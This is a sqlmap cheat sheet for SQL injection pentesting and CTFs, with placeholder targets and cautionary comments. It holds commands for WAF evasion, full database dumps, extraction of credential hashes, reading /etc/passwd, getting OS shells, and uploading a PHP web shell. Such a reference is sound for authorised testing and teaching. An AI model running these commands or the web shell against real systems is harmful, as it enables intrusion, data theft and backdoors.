SQLMap
Basic Detection
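# Basic GET parameter test (every GET parameter in the URL is tested by default)
sqlmap -u "<url>?id=1"
# Restrict testing to one named parameter
sqlmap -u "<url>?id=1&page=2" -p id
# POST request (keep URL and data quoted so the shell does not split on '&')
sqlmap -u "<url>" --data "id=1&submit=Submit"
# Raise the test level. GET/POST parameters are already tested at level 1;
# --level 2 adds Cookie header values, 3 adds User-Agent/Referer, 5 adds Host
sqlmap -u "<url>?id=1&user=test" --level 2
# Batch mode: every prompt is answered with its default, nothing is confirmed
# interactively - check what the defaults do before pairing it with a high --risk
sqlmap -u "<url>?id=1" --batch
# Verbose output (0-6; 3 prints the injected payloads, 4+ the HTTP traffic)
sqlmap -u "<url>?id=1" -v 3
# Force DBMS: skips fingerprinting and only sends payloads for that backend.
# A wrong guess means the real DBMS is never tested - use it when the backend is known
sqlmap -u "<url>?id=1" --dbms=mysql
sqlmap -u "<url>?id=1" --dbms=mssql
sqlmap -u "<url>?id=1" --dbms=postgresql
sqlmap -u "<url>?id=1" --dbms=sqlite
sqlmap -u "<url>?id=1" --dbms=oracle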
Risk & Level Flags
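# Level (1-5, default 1): how many payloads are tried per parameter and which
#   request parts are tested (2: Cookie, 3: User-Agent/Referer, 5: Host)
# Risk (1-3, default 1): 2 adds heavy time-based queries; 3 adds OR-based
#   boolean payloads, which can rewrite every row when the injection point sits
#   in an UPDATE/DELETE statement - do not run risk 3 on production data
#   without explicit sign-off
# Standard CTF/pentest
sqlmap -u "<url>?id=1" --level=3 --risk=2 --batch
# Full aggression (slow, noisy and potentially destructive - see risk 3 above)
sqlmap -u "<url>?id=1" --level=5 --risk=3 --batch
# Conservative: defaults only, prompts kept interactive so nothing runs unconfirmed
sqlmap -u "<url>?id=1" --level=1 --risk=1
# Level/risk with a known DBMS (skips fingerprinting)
sqlmap -u "<url>?id=1" --dbms=mysql --level=3 --risk=2 --batch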
GET / POST Parameter Testing
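# GET parameter
sqlmap -u "<url>?id=1" -p id --batch
# POST data (form fields); -p limits testing to a single field
sqlmap -u "<url>" --data="username=admin&password=test" -p username --batch
# POST is implied whenever --data is given; --method is only needed for other verbs
sqlmap -u "<url>" --method POST --data="id=1" --batch
# JSON POST body (sqlmap recognises JSON in --data and tests each value)
sqlmap -u "<url>" --data='{"id":1,"name":"test"}' \
  -H "Content-Type: application/json" --batch
# XML POST body
sqlmap -u "<url>" --data='<id>1</id>' \
  -H "Content-Type: application/xml" --batch
# HTML forms: parse the form(s) on the page and test their fields.
# The option is --forms (plural); it does not build multipart bodies
sqlmap -u "<url>" --forms --batch
# Multipart/form-data: capture the complete request (e.g. from Burp) and replay it
sqlmap -r multipart_request.txt --batch
# PUT request
sqlmap -u "<url>/api/users/1" --method PUT --data='{"name":"test"}' \
  -H "Content-Type: application/json" --batch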
Crawling
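# Crawl the site (depth 3) and test every discovered URL parameter.
# The crawler follows every link it finds, so on a live application exclude
# logout and other state-changing endpoints (see --crawl-exclude below)
sqlmap -u "<url>" --crawl=3 --batch
# Deeper crawl (more requests, more noise)
sqlmap -u "<url>" --crawl=5 --batch
# Exclude pages from the crawl; the option is --crawl-exclude and takes a regexp
sqlmap -u "<url>" --crawl=3 --crawl-exclude="logout|signout|delete" --batch
# Crawl and also parse/test the HTML forms found on crawled pages
sqlmap -u "<url>" --crawl=2 --forms --batch
# Restrict targets: --scope is a regexp matched against each candidate URL,
# so anchor it to the in-scope host instead of a bare substring
sqlmap -u "<url>" --crawl=3 --scope="^https?://(www\.)?<domain>/" --batch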
Authentication — Cookies
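# Session cookie for an authenticated page
sqlmap -u "<url>?id=1" --cookie="session=abc123" --batch
# Test a cookie value itself: Cookie header values are only tested at --level 2+
sqlmap -u "<url>" --cookie="id=1; session=abc123" -p id --level=2 --batch
# Multiple cookies
sqlmap -u "<url>?page=1" --cookie="auth=xyz; PHPSESSID=abc123" --batch
# Cookie jar from file (Netscape/wget format, e.g. a browser or curl export)
sqlmap -u "<url>?id=1" --load-cookies cookies.txt --batch
# Login form: this tests the login form's own fields. sqlmap does NOT log in
# for you - for pages behind authentication, supply a valid session cookie
# (above) or replay an authenticated request with -r
sqlmap -u "<login_url>" --data="user=<username>&pass=<password>" --batch
sqlmap -u "<login_url>" --forms --batch
# HTTP Basic auth
sqlmap -u "<url>?id=1" --auth-type=basic \
  --auth-cred="<username>:<password>" --batch
# HTTP Digest auth
sqlmap -u "<url>?id=1" --auth-type=digest \
  --auth-cred="<username>:<password>" --batch
# HTTP NTLM auth (needs the python-ntlm library; "\\" in double quotes yields one backslash)
sqlmap -u "<url>?id=1" --auth-type=ntlm \
  --auth-cred="<domain>\\<username>:<password>" --batch
# Bearer token (any extra header is passed with -H / --header)
sqlmap -u "<url>?id=1" \
  -H "Authorization: Bearer <token>" --batch
# API key header
sqlmap -u "<url>?id=1" \
  -H "X-Api-Key: <api_key>" --batch
# Credentials and tokens given on the command line land in shell history,
# in 'ps' output and in sqlmap's session/log files under its output directory.
# Prefer a request file (-r) with restrictive permissions and clean up afterwards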
Database Enumeration
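# List databases
sqlmap -u "<url>?id=1" --dbs --batch
# Current database
sqlmap -u "<url>?id=1" --current-db --batch
# Current DB user
sqlmap -u "<url>?id=1" --current-user --batch
# Does the DB user have DBA privileges? (decides whether file/OS features are worth trying)
sqlmap -u "<url>?id=1" --is-dba --batch
# List tables in a database
sqlmap -u "<url>?id=1" -D <database> --tables --batch
# List columns in a table
sqlmap -u "<url>?id=1" -D <database> -T <table> --columns --batch
# Dump table data
sqlmap -u "<url>?id=1" -D <database> -T <table> --dump --batch
# Dump only a few rows - usually enough to prove impact without copying the whole table
sqlmap -u "<url>?id=1" -D <database> -T <table> --dump --start=1 --stop=5 --batch
# Dump specific columns
sqlmap -u "<url>?id=1" -D <database> -T <table> -C <col1>,<col2> --dump --batch
# Dump every database. This copies all application data to disk and, unless
# excluded, the system schemas too - confirm the engagement scope covers it
sqlmap -u "<url>?id=1" --dump-all --exclude-sysdbs --batch
# Search all databases for a column name
sqlmap -u "<url>?id=1" --search -C password --batch
# Search for a table name
sqlmap -u "<url>?id=1" --search -T users --batch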
Blind Injection Techniques
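# Boolean-based blind
sqlmap -u "<url>?id=1" --technique=B --batch
# Time-based blind
sqlmap -u "<url>?id=1" --technique=T --batch
# Error-based
sqlmap -u "<url>?id=1" --technique=E --batch
# Union-based
sqlmap -u "<url>?id=1" --technique=U --batch
# Stacked queries (needed for most OS-level features)
sqlmap -u "<url>?id=1" --technique=S --batch
# All techniques (this is also what sqlmap uses when --technique is omitted)
sqlmap -u "<url>?id=1" --technique=BEUSTQ --batch
# Time-based: --time-sec is the delay the payload asks the DBMS for (default 5).
# Raise it on jittery links so ordinary latency is not mistaken for a SLEEP
sqlmap -u "<url>?id=1" --technique=T --time-sec=10 --batch
# Slow targets: connection timeout (default 30 s) and retries (default 3)
sqlmap -u "<url>?id=1" --timeout=60 --retries=5 --batch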
Tamper Scripts
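# List available tampers
sqlmap --list-tampers
# Replace spaces with inline comments (/**/) - basic WAF evasion
sqlmap -u "<url>?id=1" --tamper=space2comment --batch
# URL-encode every payload character
sqlmap -u "<url>?id=1" --tamper=charencode --batch
# Double URL-encode
sqlmap -u "<url>?id=1" --tamper=chardoubleencode --batch
# hex2char is the reverse of hex-encoding: it rewrites MySQL 0x<hex> string
# literals as CONCAT(CHAR(...)) so a filter on 0x... does not trip
sqlmap -u "<url>?id=1" --tamper=hex2char --batch
# MySQL: space -> '--' comment followed by a newline, plus URL-encoding
sqlmap -u "<url>?id=1" --tamper=space2mysqldash,charencode --batch
# MSSQL specific
sqlmap -u "<url>?id=1" --dbms=mssql --tamper=space2comment,charencode --batch
# Common WAF bypass combo
sqlmap -u "<url>?id=1" \
  --tamper=space2comment,charencode,randomcase \
  --level=3 --risk=2 --batch
# ModSecurity/CRS-style filters: 'between' rewrites '>' comparisons as NOT BETWEEN
sqlmap -u "<url>?id=1" \
  --tamper=between,charencode,space2comment \
  --batch
# Multiple tampers. Two notes: sqlmap orders chained tampers by their
# internal priority, not by the order given here (verify the final payload
# with -v 3), and apostrophemask/apostrophenullencode both rewrite the same
# quote character, so whichever runs second has nothing left to do - pick one
sqlmap -u "<url>?id=1" \
  --tamper=apostrophemask,charencode \
  --batch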
OS Shell & Command Execution
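# Interactive OS shell. Needs stacked queries (MSSQL xp_cmdshell, MySQL/PostgreSQL
# UDF upload) or, for MySQL without stacking, a file write into the web root
# (web backdoor). Either route uploads files to the target (UDF library or
# stager + backdoor) - record what was created and remove it when the engagement ends
sqlmap -u "<url>?id=1" --os-shell --batch
# Single OS command
sqlmap -u "<url>?id=1" --os-cmd="whoami" --batch
# Windows command. On MSSQL sqlmap re-enables xp_cmdshell via sp_configure if it
# is disabled - a persistent server setting that should be logged and reverted
sqlmap -u "<url>?id=1" --os-cmd="ipconfig" --dbms=mssql --batch
# Web-backdoor route: --web-root is where the stager is dropped. The DB process
# must be able to write there and the web server must serve that path, which in
# practice means DB and web server on the same host (or a shared filesystem)
sqlmap -u "<url>?id=1" --os-shell --web-root=/var/www/html --batch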
File Read / Write
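# Read a server file. MySQL: needs the FILE privilege and a path permitted by
# secure_file_priv; PostgreSQL: superuser (or the pg_read_server_files role)
sqlmap -u "<url>?id=1" --file-read="/etc/passwd" --batch
sqlmap -u "<url>?id=1" --file-read="C:/Windows/win.ini" --batch
# Write a local file to the server. MySQL: INTO OUTFILE/DUMPFILE, needs FILE
# privilege and secure_file_priv allowing the destination; PostgreSQL: superuser
sqlmap -u "<url>?id=1" \
  --file-write=shell.php \
  --file-dest=/var/www/html/shell.php \
  --batch
# Write a web shell. Stage it in a private temp file rather than a fixed /tmp
# name, and give the remote copy a non-guessable filename: an unauthenticated
# system($_GET["cmd"]) is usable by anyone who finds it. Log the destination
# path and delete the file before closing out the engagement
shell_src="$(mktemp)"
printf '%s\n' '<?php system($_GET["cmd"]); ?>' > "$shell_src"
sqlmap -u "<url>?id=1" \
  --file-write="$shell_src" \
  --file-dest="/var/www/html/<random_name>.php" \
  --batch
rm -f -- "$shell_src"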
Proxy & Output
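# Route through Burp (inspect/replay exactly what sqlmap sends)
sqlmap -u "<url>?id=1" --proxy=http://127.0.0.1:8080 --batch
# SOCKS5 proxy
sqlmap -u "<url>?id=1" --proxy=socks5://127.0.0.1:1080 --batch
# Save output to a directory. It holds session.sqlite, logs and dumped tables
# (credentials included) - keep it off shared paths and restrict permissions
sqlmap -u "<url>?id=1" --output-dir="/tmp/sqlmap_<target>" --batch
chmod -R go-rwx "/tmp/sqlmap_<target>"
# Dump format: CSV is already the default (--dump-format=CSV|HTML|SQLITE);
# --csv-del changes the delimiter, whose default is ","
sqlmap -u "<url>?id=1" -D <database> -T <table> --dump --batch --dump-format=CSV --csv-del=";"
# Replay a request saved from Burp
sqlmap -r request.txt --batch
sqlmap -r request.txt -p <parameter> --batch
# Threads (1-10). sqlmap switches back to a single thread for time-based
# blind retrieval, where parallel requests would skew the timing
sqlmap -u "<url>?id=1" --threads=5 --batch
# Delay between requests, in seconds (rate limits, lower noise)
sqlmap -u "<url>?id=1" --delay=1 --batch
# Random User-Agent from sqlmap's built-in list
sqlmap -u "<url>?id=1" --random-agent --batch
# Mobile User-Agent
sqlmap -u "<url>?id=1" --mobile --batch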
DBMS-Specific Attacks
MySQL
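# MySQL full recon
sqlmap -u "<url>?id=1" --dbms=mysql --dbs --current-user --is-dba --batch
# OS-level privilege escalation. --priv-esc is consumed by the Metasploit
# takeover path (--os-pwn, which needs --msf-path) and does nothing on its own;
# sqlmap's MySQL command execution itself works by uploading a sys_exec UDF
# (stacked queries + FILE privilege) - that is --os-shell/--os-pwn, not --priv-esc
sqlmap -u "<url>?id=1" --dbms=mysql --os-pwn --priv-esc --msf-path="<msf_dir>" --batch
# MySQL file read (FILE privilege + secure_file_priv)
sqlmap -u "<url>?id=1" --dbms=mysql --file-read="/etc/passwd" --batch
# Dump the mysql.user grant table (password hashes; needs read access to mysql.*)
sqlmap -u "<url>?id=1" --dbms=mysql -D mysql -T user --dump --batch
# OS shell via stacked queries (UDF upload). Restricting detection to S means
# no shell at all if stacking is unavailable - drop --technique to let sqlmap
# fall back to the web-backdoor route
sqlmap -u "<url>?id=1" --dbms=mysql --technique=S --os-shell --batch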
MSSQL
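# MSSQL full recon
sqlmap -u "<url>?id=1" --dbms=mssql --dbs --current-user --is-dba --batch
# OS shell via xp_cmdshell. If the procedure is disabled sqlmap re-enables it
# with sp_configure - a persistent server setting: record it and revert it
sqlmap -u "<url>?id=1" --dbms=mssql --os-shell --batch
# Linked servers (lateral-movement targets)
sqlmap -u "<url>?id=1" --dbms=mssql \
  --sql-query="SELECT name FROM sys.servers" --batch
# SQL logins with hashes. Query the catalog view directly instead of relying on
# how -T maps a schema-qualified name; password_hash is only visible with
# CONTROL SERVER / sysadmin
sqlmap -u "<url>?id=1" --dbms=mssql \
  --sql-query="SELECT name,password_hash FROM master.sys.sql_logins" --batch
# Web application behind Windows (NTLM) HTTP auth - this authenticates to the
# web server, not to SQL Server
sqlmap -u "<url>?id=1" --dbms=mssql --auth-type=ntlm \
  --auth-cred="<domain>\\<username>:<password>" --batch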
PostgreSQL
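# PostgreSQL full recon
sqlmap -u "<url>?id=1" --dbms=postgresql --dbs --current-user --is-dba --batch
# File write via COPY ... TO / large-object export: requires superuser (or the
# pg_write_server_files role). The local source file must exist first
sqlmap -u "<url>?id=1" --dbms=postgresql --file-write="/tmp/shell.php" \
  --file-dest="/var/www/html/shell.php" --batch
# OS shell: needs stacked queries and superuser; sqlmap loads its sys_exec UDF
# into the server (an uploaded library to clean up afterwards)
sqlmap -u "<url>?id=1" --dbms=postgresql --os-shell --batch
# Role list with password hashes: pg_authid is readable by superuser only
# (non-superusers can still list roles from pg_roles, with rolpassword masked)
sqlmap -u "<url>?id=1" --dbms=postgresql \
  --sql-query="SELECT rolname,rolpassword FROM pg_authid" --batch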
SQLite
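# SQLite is a single-file DB with no users, privileges or multiple databases:
# --dbs, --current-user and --is-dba are meaningless here, so go straight to tables
sqlmap -u "<url>?id=1" --dbms=sqlite --tables --batch
# Dump everything (the file is usually small, but this still copies every row)
sqlmap -u "<url>?id=1" --dbms=sqlite --dump-all --batch
# Dump one table (no -D needed)
sqlmap -u "<url>?id=1" --dbms=sqlite -T users --dump --batch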
Burp Request File Usage
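# Save the raw request from Burp ("Copy to file") as request.txt, then:
sqlmap -r request.txt --batch
# Mark the exact injection point with an asterisk inside the request file
# (change id=1 -> id=1*); sqlmap then focuses on the marked spot(s)
sqlmap -r request.txt --batch
# Or name the parameter on the command line
sqlmap -r request.txt -p <parameter> --batch
# A request file carries no scheme: add --force-ssl when the target is HTTPS
sqlmap -r request.txt --force-ssl --batch
# Full attack from the request file (it already contains the session cookie and
# headers from Burp, so no extra auth flags are needed)
sqlmap -r request.txt --level=3 --risk=2 \
  --dbs --random-agent --batch \
  --output-dir="/tmp/sqlmap_<target>"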
Common One-Liners
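# Quick check: is it injectable? Detection only - add enumeration flags once
# the finding is confirmed to be in scope
sqlmap -u "<url>?id=1" --batch
# CTF standard: full dump (system schemas skipped). On a real engagement
# replace --dump-all with a targeted -D/-T --dump plus --start/--stop
sqlmap -u "<url>?id=1" --batch --level=3 --risk=2 \
  --dbs --dump-all --exclude-sysdbs --random-agent
# From Burp with a session cookie. request.txt normally already carries its
# Cookie header; pass --cookie only to swap in a fresh session
sqlmap -r request.txt --cookie="session=<session_token>" \
  --level=3 --risk=2 --batch --dbs
# WAF bypass + full dump. Risk 3 includes OR-based payloads that can modify
# rows when the injection sits in an UPDATE/DELETE - not for production data
sqlmap -u "<url>?id=1" \
  --tamper=space2comment,charencode,randomcase \
  --level=5 --risk=3 --batch --dbs --dump-all \
  --random-agent --threads=3
# Time-based blind on a slow target. The default --time-sec is already 5;
# raise it so latency spikes are not read as a successful SLEEP
sqlmap -u "<url>?id=1" --technique=T --time-sec=10 \
  --dbms=mysql --level=3 --batch --dbs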